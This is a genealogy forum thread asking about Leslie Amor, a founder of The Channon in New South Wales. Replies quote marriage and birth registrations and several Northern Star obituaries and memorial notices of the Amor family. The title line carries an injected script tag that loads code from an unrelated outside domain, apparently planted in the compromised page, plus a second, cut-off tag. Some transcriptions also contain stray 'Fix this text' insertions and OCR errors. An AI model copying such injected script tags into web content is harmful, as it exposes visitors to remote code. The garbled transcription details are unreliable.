I'd like to find out information about the Amor family (Leslie Amor) who helped found The Channon in NSW Australia. I think he was a logger and later had a dairy farm?<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="h :: FamilyTreeCircles.com Genealogy
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I'd like to find out information about the Amor family (Leslie Amor) who helped found The Channon in NSW Australia. I think he was a logger and later had a dairy farm?

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by markav on 2017-07-28 13:21:23

Name: Leslie Amor
Spouse Name: Edith J Bettens
Marriage Date: 1914
Marriage Place: New South Wales
Registration Place: Lismore, New South Wales
Registration Year: 1914
Registration Number: 12155

Name: Edith J Bettens
Birth Date: 1894
Birth Place: New South Wales
Registration Year: 1894
Registration Place: Milton, New South Wales, Australia
Father: Joseph Bettens
Mother: Ellen
Registration Number: 21058

by markav on 2017-07-28 13:30:43

The death occurred on Friday night of Miss Gwen
Amor (18), daughter of Mr. and
Mrs. Leslie Amor, of the Chan-
non Road, after a short illness.
Miss Amor was borm in Lismore
and had resided with her parents
at Channon Road. She was an
active member of Lodge Channon
P.A.F.S. No. 174. She is sur-
vived by her parents, two bro-
thers Max (A.I.F.), and Allan
Amor (Channon Road), and two
sisters, Enid and Mavis Amor
(Channon Road).
The remains were conveyed to
the Church of England, Dunoon,
where Rev. H. W. Carr con-
ducted a service. There was a
large attendance at the Church
and members of the Lodge Chan-
non P.A.F.S. formed a guard of
honour as the casket was carried
from the church. The service at
the graveside was also conducted
by Mr. Carr, and the lodge ser-
vice at the graveside by Bro. A.
A. Brown (Chaplain). The pall
bearers at the church were Allan
and Max Amor (brothers), George
Funnell, H. Rootes, A. Bettons
at the graveside Messrs. A. A.
and C. McConnell (cousins), and
Fix this textBrown, R. Herne, J. Stuckey, H.
Higgins, T. Haynes and J. Cur-
rie. The funeral arrangements
were carried out by Will Riley and
Son.
from The Northen Star Newspaper 28th January 1946

by markav on 2017-07-28 14:39:00

parents of Leslie

OBITUARY
MR. G. AMOR .
The death occurred at a Goulburn
hospital on Monday last of Mr. George
Amor, of Middle Arm Road, at the
age of 74 years, death being due to
bronchial asthma. The late Mr.
Amor is survived by a widow, four
daughters, Mrs. G. Thoroughgood and
Amy Amor (Lismore) and Mrs. M.
Charteris, and Dulcie Amor, Goul-
burn, and four sons, Leslie (Lis-
more), George (Bangalore), Harry
(Bellambi) and Selby (Binna Burra).
One son, Jim, predeceased him.
The funeral took place at 10 o'clock
on Tuesday morning at the Church
of England Cemetery, the Rev. Clive
Statham officiating at the graveside.

MRS. EMILY AMOR,
The death occurred in a Goulburn
Fix this texthospital on November 7 of Mrs. Emily
Susan Amor, aged 72 years, widow of
the late George Amor, of Middle Arm
Road.
Mrs. Amor was well known for her
cheery and kindly disposition and
possessed a wide circle of friends. She
leaves a grown-up family of four sons
and four daughters.
The funeral took place on Novem-
ber 9, and was attended by a large
number of mourners. both died in 1933

by Crawford on 2017-07-29 05:47:26

IN MEMORIAM.

AMOR.—In loving memory of our darling little boy Clive Samuel, who departed this life on the 10th May, 1920, aged 2 years and five weeks.

Fond are the ties that are broken,
Dear is our loved one that's gone ;
Sad are the hearts that are waiting
To join Clive in yonder bright home.
Inserted by his loving mother and father, E. and L. Amor.

Northern Star (Lismore, NSW : 1876 - 1954), Tuesday 10 May 1921, page 1

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